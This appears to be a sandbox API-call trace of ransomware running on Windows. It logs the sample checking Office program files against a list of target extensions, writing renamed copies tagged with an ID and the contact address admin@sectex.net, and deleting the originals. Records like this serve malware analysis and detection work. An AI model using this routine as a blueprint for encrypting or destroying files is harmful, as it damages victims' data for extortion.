	[0159.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.743] lstrlenW (lpString=".jpg") returned 4
	[0159.743] lstrcmpiW (lpString1=".jpg", lpString2=".ADD") returned 1
	[0159.743] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0159.743] lstrlenW (lpString="EXCEL.EXE") returned 9
	[0159.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.743] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=28232544) returned 1
	[0159.743] CloseHandle (hObject=0x1b4) returned 1
	[0159.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe")) returned 0x20
	[0159.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.744] lstrlenW (lpString=".doc") returned 4
	[0159.744] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0159.744] lstrlenW (lpString=".docx") returned 5
	[0159.744] lstrcmpiW (lpString1=".docx", lpString2="L.EXE") returned -1
	[0159.744] lstrlenW (lpString=".pdf") returned 4
	[0159.744] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0159.744] lstrlenW (lpString=".xls") returned 4
	[0159.744] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0159.744] lstrlenW (lpString=".xlsx") returned 5
	[0159.744] lstrcmpiW (lpString1=".xlsx", lpString2="L.EXE") returned -1
	[0159.744] lstrlenW (lpString=".ppt") returned 4
	[0159.744] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0159.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.744] lstrlenW (lpString=".zip") returned 4
	[0159.744] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0159.744] lstrlenW (lpString=".rar") returned 4
	[0159.744] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString=".bz2") returned 4
	[0159.745] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0159.745] lstrlenW (lpString=".7z") returned 3
	[0159.745] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString=".dbf") returned 4
	[0159.745] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString=".1cd") returned 4
	[0159.745] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString=".jpg") returned 4
	[0159.745] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString=".doc") returned 4
	[0159.745] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0159.745] lstrlenW (lpString=".docx") returned 5
	[0159.745] lstrcmpiW (lpString1=".docx", lpString2="L.EXE") returned -1
	[0159.745] lstrlenW (lpString=".pdf") returned 4
	[0159.745] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString=".xls") returned 4
	[0159.745] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString=".xlsx") returned 5
	[0159.745] lstrcmpiW (lpString1=".xlsx", lpString2="L.EXE") returned -1
	[0159.745] lstrlenW (lpString=".ppt") returned 4
	[0159.745] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.745] lstrlenW (lpString=".zip") returned 4
	[0159.745] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0159.745] lstrlenW (lpString=".rar") returned 4
	[0159.746] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0159.746] lstrlenW (lpString=".bz2") returned 4
	[0159.746] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0159.746] lstrlenW (lpString=".7z") returned 3
	[0159.746] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0159.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.746] lstrlenW (lpString=".dbf") returned 4
	[0159.746] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0159.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.746] lstrlenW (lpString=".1cd") returned 4
	[0159.746] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0159.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE") returned 52
	[0159.746] lstrlenW (lpString=".jpg") returned 4
	[0159.746] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0159.746] lstrcmpiW (lpString1=".manifest", lpString2=".bot") returned 1
	[0159.746] lstrlenW (lpString="excel.exe.manifest") returned 18
	[0159.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.747] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1196) returned 1
	[0159.747] CloseHandle (hObject=0x1b4) returned 1
	[0159.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest")) returned 0x20
	[0159.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.747] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.747] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.748] GetLastError () returned 0x0
	[0159.748] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x4ac, lpOverlapped=0x0) returned 1
	[0159.750] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x4b0, lpOverlapped=0x0) returned 1
	[0159.751] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.751] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0159.751] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.751] CloseHandle (hObject=0x3f0) returned 1
	[0159.751] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.751] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.753] CloseHandle (hObject=0x1b4) returned 1
	[0159.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest")) returned 1
	[0159.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.754] lstrlenW (lpString=".doc") returned 4
	[0159.754] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0159.754] lstrlenW (lpString=".docx") returned 5
	[0159.754] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0159.754] lstrlenW (lpString=".pdf") returned 4
	[0159.754] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0159.754] lstrlenW (lpString=".xls") returned 4
	[0159.754] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0159.754] lstrlenW (lpString=".xlsx") returned 5
	[0159.754] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0159.754] lstrlenW (lpString=".ppt") returned 4
	[0159.754] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0159.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.754] lstrlenW (lpString=".zip") returned 4
	[0159.755] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".rar") returned 4
	[0159.755] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".bz2") returned 4
	[0159.755] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".7z") returned 3
	[0159.755] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString=".dbf") returned 4
	[0159.755] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString=".1cd") returned 4
	[0159.755] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString=".jpg") returned 4
	[0159.755] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString=".doc") returned 4
	[0159.755] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".docx") returned 5
	[0159.755] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0159.755] lstrlenW (lpString=".pdf") returned 4
	[0159.755] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".xls") returned 4
	[0159.755] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString=".xlsx") returned 5
	[0159.755] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0159.755] lstrlenW (lpString=".ppt") returned 4
	[0159.755] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0159.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.755] lstrlenW (lpString=".zip") returned 4
	[0159.756] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0159.756] lstrlenW (lpString=".rar") returned 4
	[0159.756] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0159.756] lstrlenW (lpString=".bz2") returned 4
	[0159.756] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0159.756] lstrlenW (lpString=".7z") returned 3
	[0159.756] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0159.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.756] lstrlenW (lpString=".dbf") returned 4
	[0159.756] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0159.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.756] lstrlenW (lpString=".1cd") returned 4
	[0159.756] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0159.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest") returned 61
	[0159.756] lstrlenW (lpString=".jpg") returned 4
	[0159.756] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0159.756] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0159.756] lstrlenW (lpString="excelcnv.exe") returned 12
	[0159.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnv.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.758] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=24994656) returned 1
	[0159.758] CloseHandle (hObject=0x1b4) returned 1
	[0159.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnv.exe")) returned 0x20
	[0159.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnv.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnv.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnv.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.758] lstrlenW (lpString=".doc") returned 4
	[0159.758] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0159.758] lstrlenW (lpString=".docx") returned 5
	[0159.758] lstrcmpiW (lpString1=".docx", lpString2="v.exe") returned -1
	[0159.758] lstrlenW (lpString=".pdf") returned 4
	[0159.758] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0159.758] lstrlenW (lpString=".xls") returned 4
	[0159.758] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0159.758] lstrlenW (lpString=".xlsx") returned 5
	[0159.758] lstrcmpiW (lpString1=".xlsx", lpString2="v.exe") returned -1
	[0159.758] lstrlenW (lpString=".ppt") returned 4
	[0159.758] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0159.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString=".zip") returned 4
	[0159.759] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0159.759] lstrlenW (lpString=".rar") returned 4
	[0159.759] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0159.759] lstrlenW (lpString=".bz2") returned 4
	[0159.759] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0159.759] lstrlenW (lpString=".7z") returned 3
	[0159.759] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0159.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString=".dbf") returned 4
	[0159.759] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0159.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString=".1cd") returned 4
	[0159.759] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0159.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString=".jpg") returned 4
	[0159.759] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0159.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.759] lstrlenW (lpString=".doc") returned 4
	[0159.759] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0159.759] lstrlenW (lpString=".docx") returned 5
	[0159.759] lstrcmpiW (lpString1=".docx", lpString2="v.exe") returned -1
	[0159.759] lstrlenW (lpString=".pdf") returned 4
	[0159.759] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0159.759] lstrlenW (lpString=".xls") returned 4
	[0159.759] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0159.759] lstrlenW (lpString=".xlsx") returned 5
	[0159.759] lstrcmpiW (lpString1=".xlsx", lpString2="v.exe") returned -1
	[0159.759] lstrlenW (lpString=".ppt") returned 4
	[0159.759] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0159.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.760] lstrlenW (lpString=".zip") returned 4
	[0159.760] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0159.760] lstrlenW (lpString=".rar") returned 4
	[0159.760] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0159.760] lstrlenW (lpString=".bz2") returned 4
	[0159.760] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0159.760] lstrlenW (lpString=".7z") returned 3
	[0159.760] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0159.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.760] lstrlenW (lpString=".dbf") returned 4
	[0159.760] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0159.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.760] lstrlenW (lpString=".1cd") returned 4
	[0159.760] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0159.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnv.exe") returned 55
	[0159.760] lstrlenW (lpString=".jpg") returned 4
	[0159.760] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0159.760] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0159.760] lstrlenW (lpString="excelcnvpxy.dll") returned 15
	[0159.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnvpxy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.761] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=48480) returned 1
	[0159.761] CloseHandle (hObject=0x1b4) returned 1
	[0159.761] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnvpxy.dll")) returned 0x20
	[0159.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnvpxy.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\excelcnvpxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.762] lstrlenW (lpString=".doc") returned 4
	[0159.762] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString=".docx") returned 5
	[0159.762] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1
	[0159.762] lstrlenW (lpString=".pdf") returned 4
	[0159.762] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString=".xls") returned 4
	[0159.762] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString=".xlsx") returned 5
	[0159.762] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1
	[0159.762] lstrlenW (lpString=".ppt") returned 4
	[0159.762] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.762] lstrlenW (lpString=".zip") returned 4
	[0159.762] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString=".rar") returned 4
	[0159.762] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.762] lstrlenW (lpString=".bz2") returned 4
	[0159.762] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.762] lstrlenW (lpString=".7z") returned 3
	[0159.762] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString=".dbf") returned 4
	[0159.763] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString=".1cd") returned 4
	[0159.763] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString=".jpg") returned 4
	[0159.763] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString=".doc") returned 4
	[0159.763] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString=".docx") returned 5
	[0159.763] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1
	[0159.763] lstrlenW (lpString=".pdf") returned 4
	[0159.763] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString=".xls") returned 4
	[0159.763] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString=".xlsx") returned 5
	[0159.763] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1
	[0159.763] lstrlenW (lpString=".ppt") returned 4
	[0159.763] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.763] lstrlenW (lpString=".zip") returned 4
	[0159.763] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString=".rar") returned 4
	[0159.763] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.763] lstrlenW (lpString=".bz2") returned 4
	[0159.763] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.763] lstrlenW (lpString=".7z") returned 3
	[0159.764] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.764] lstrlenW (lpString=".dbf") returned 4
	[0159.764] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.764] lstrlenW (lpString=".1cd") returned 4
	[0159.764] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\excelcnvpxy.dll") returned 58
	[0159.764] lstrlenW (lpString=".jpg") returned 4
	[0159.764] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.764] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.764] lstrlenW (lpString="EXSEC32.DLL") returned 11
	[0159.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\exsec32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.765] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=474960) returned 1
	[0159.765] CloseHandle (hObject=0x1b4) returned 1
